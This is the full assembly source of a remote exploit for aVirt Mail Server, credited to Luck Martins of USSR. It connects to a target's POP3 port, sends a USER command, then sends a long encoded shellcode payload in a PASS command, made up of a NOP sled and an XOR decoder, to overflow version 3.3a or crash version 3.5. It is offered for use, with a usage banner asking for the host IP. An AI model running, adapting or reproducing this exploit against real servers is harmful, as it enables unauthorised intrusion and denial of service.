;========================================================================
; This is the source code of Avirt 3.3a Buffer oVerflow                 =
; or Avirt 3.5 D.O.S                                                    =
; Source by: Luck Martins , USSR                                        =
; www.ussrback.com                                                      =
;                                                                       =
;Recomendation: dont read this Source :), or you can get Crazzzy!!!     =
;========================================================================

.386p
locals
jumps
.model flat, stdcall

extrn   GetCommandLineA:PROC
extrn   GetStdHandle:PROC
extrn   WriteConsoleA:PROC
extrn   ExitProcess:PROC
extrn   WSAStartup:PROC
extrn   connect:PROC
extrn   send:PROC
extrn   recv:PROC
extrn   WSACleanup:PROC
extrn   htons:PROC
extrn   socket:PROC
extrn   inet_addr:PROC
extrn   closesocket:PROC
Extrn	GetModuleHandleA	      : PROC
Extrn	GetProcAddress		      : PROC
Extrn	lstrlenA		      : PROC

.data


sploit_code label byte
 DB 80,65,83,83,32,139,241,102,129,238,144,2,176,48,51,201,102,185,71,2
 DB 102,49,6,102,70,226,249,144,144,144,144,144,144,144,144,144,144,144,144,144
 DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
 DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
 DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
 DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
 DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
 DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
 DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144
 DB 144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,216,48,48
 DB 48,48,109,177,221,21,32,112,48,177,244,48,51,48,48,3,240,3,235,3
 DB 198,3,207,3,226,3,249,188,248,152,52,69,62,187,181,166,33,112,48,187
 DB 173,129,33,112,48,219,60,187,181,162,33,112,48,187,173,157,33,112,48,219
 DB 60,106,106,106,106,106,106,106,106,106,106,106,106,189,189,170,33,112,48,97
 DB 96,207,227,185,181,153,33,112,48,188,248,152,52,69,62,187,181,166,33,112
 DB 48,187,173,129,33,112,48,219,60,187,181,162,33,112,48,187,173,157,33,112
 DB 48,189,189,244,33,112,48,97,96,207,227,185,181,225,33,112,48,189,181,133
 DB 33,112,48,96,207,165,225,33,112,48,185,181,240,33,112,48,189,189,229,33
 DB 112,48,97,207,133,240,33,112,48,207,165,153,33,112,48,185,181,209,33,112
 DB 48,188,248,152,52,69,56,187,181,166,33,112,48,219,54,187,181,162,33,112
 DB 48,189,189,213,33,112,48,97,96,207,165,153,33,112,48,185,181,221,33,112
 DB 48,219,48,188,248,152,52,69,56,187,181,166,33,112,48,219,54,187,181,162
 DB 33,112,48,189,189,193,33,112,48,97,96,207,165,153,33,112,48,185,181,206
 DB 33,112,48,189,181,50,34,112,48,96,90,48,90,48,189,181,122,33,112,48
 DB 96,90,48,90,48,187,181,206,33,112,48,207,224,219,206,80,216,48,48,48
 DB 48,109,177,221,96,33,112,48,88,32,48,52,48,189,173,43,34,112,48,99
 DB 189,173,30,34,112,48,99,90,48,207,165,209,33,112,48,90,51,189,133,54
 DB 34,112,48,102,207,165,221,33,112,48,81,242,32,48,123,117,98,126,117,124
 DB 3,2,30,84,92,92,48,48,48,199,143,48,48,192,71,119,85,68,96,66
 DB 95,83,113,84,84,66,85,67,67,48,48,48,48,48,152,93,199,143,32,112
 DB 193,71,101,99,117,98,3,2,30,116,124,124,48,48,48,48,48,124,95,81
 DB 84,124,89,82,66,81,66,73,113,48,48,48,48,48,125,85,67,67,81,87
 DB 85,114,95,72,113,48,48,48,48,48,103,89,94,117,72,85,83,48,48,48
 DB 48,48,115,66,85,81,68,85,100,88,66,85,81,84,48,48,48,48,48,48
 DB 48,48,48,108,71,89,94,84,95,71,67,108,94,95,68,85,64,81,84,30
 DB 85,72,85,48,105,95,69,16,113,66,85,16,117,72,64,92,95,89,68,85
 DB 84,30,48,96,81,68,83,88,16,68,88,89,67,16,64,66,95,87,66,81
 DB 93,16,64,92,85,81,67,85,30,30,30,30,30,30,30,48,48,48,48,48
 DB 48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,48,176,222,84
 DB 1,97,33,97,97,97,97,97,97,97,97,97,97,97,97,97,97,0,193,4
 DB 0,0,193,4,0,0,193,4,0,190,32,32,32,32,176,48,102,185,71,2
 DB 102,46,103,49,4,102,70,226,247,0,1,84,222,176

sploit_code_length   equ     $-sploit_code

senduser        db 'USER itsme',13,10
senduserl       equ  $-senduser

Copy            db "aVirt Mail Server 3.3a Remote Oveflow.", 13, 10
                db "or aVirt Mail Server 3.5 Denial of Service", 13, 10
                db "by: Luck Martins, Ussr",13,10
                db "for source code or binary go to: http://www.ussrback.com/avirtro",13,10,13,10
                db "Usage: AvirtExp HostIp", 13, 10
                db "Example: AvirtExp 205.488.47.6",13,10,0
Copyl		equ $-Copy

wsadescription_len equ 256
wsasys_status_len equ 128

WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?
WSAdata ends

sockaddr_in struct
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup (0)
sockaddr_in ends

wsadata WSAdata
sin sockaddr_in
sock dd ?
numbase dd 10
hostParamether db 256 dup (?)
buffer dd 1000 dup (0)
buffer2 dd 1000 dup (0)

i_cant_connect	db 'fata: sorry i can',27h,'t connect to this host!',13,10
i_cant_connectl equ $-i_cant_connect

SendingExploit	db 'ok!: Sending exploit code....',13,10
SendingExploitl equ $-SendingExploit

include code.inc

cchWritten dd 0
ConHandle dd 0

.code
start:
	xor	eax,eax
	xor	ebx,ebx
	xor	edx,edx
	xor	ecx,ecx
	xor	esi,esi
	xor	edi,edi
	xor	ebp,ebp
	Push	-11
	Call	GetStdHandle
	Mov	[ConHandle],EAX
	call	GetCommandLineA
	mov	edi, eax
	mov	ecx, -1
	xor	al, al
	push	edi
	repnz	scasb
	not	ecx
	pop	edi
	mov	al, 20h
	repnz	scasb
	dec	ecx
	mov	esi, edi
	cmp	byte ptr [esi],0
	je	no_command_line
	cmp	byte ptr [esi],20
	je	incrementa1
continue:
        lea     edi, hostParamether
	rep	movsb
	push	offset wsadata
	push	0101h
	call	WSAStartup
	xor	eax, eax
	push	eax
	inc	eax
	push	eax
	inc	eax
	push	eax
	call	socket
	mov	sock, eax
	mov	sin.sin_family, 2
	mov	eax,110d
	push	eax
	call	htons

	mov	sin.sin_port, ax
        push    offset hostParamether
	call	inet_addr

	mov	sin.sin_addr, eax
	push	size sin
	push	offset sin
	push	sock
	call	connect
	or	eax, eax
	jz	connectionworking
	Write_Console <offset i_cant_connect > <i_cant_connectl >
	jmp	the_end
incrementa1:
	inc   si
	jmp   continue
connectionworking:
	xor	eax, eax
	push	eax
	push	1000
	push	offset buffer
	push	sock
	call	recv
        push    offset buffer
	call	lstrlenA
	Write_Console <offset buffer  > <eax >
        Write_Console <offset SendingExploit > <SendingExploitl >
        xor     eax, eax
	push	eax
	push	senduserl
	push	offset senduser
	push	sock
	call	send
        xor     eax, eax
	push	eax
	push	1000
        push    offset buffer2
	push	sock
	call	recv
        push    offset buffer
	call	lstrlenA
	Write_Console <offset buffer  > <eax >
        xor     eax, eax
	push	eax
	push	sploit_code_length
	push	offset sploit_code
	push	sock
	call	send
the_end:
	push	sock
	call	closesocket
	call	WSACleanup
final_exit:
	push	0
	call	ExitProcess
no_command_line:
	Write_Console <offset Copy > <Copyl >
	jmp   final_exit
end start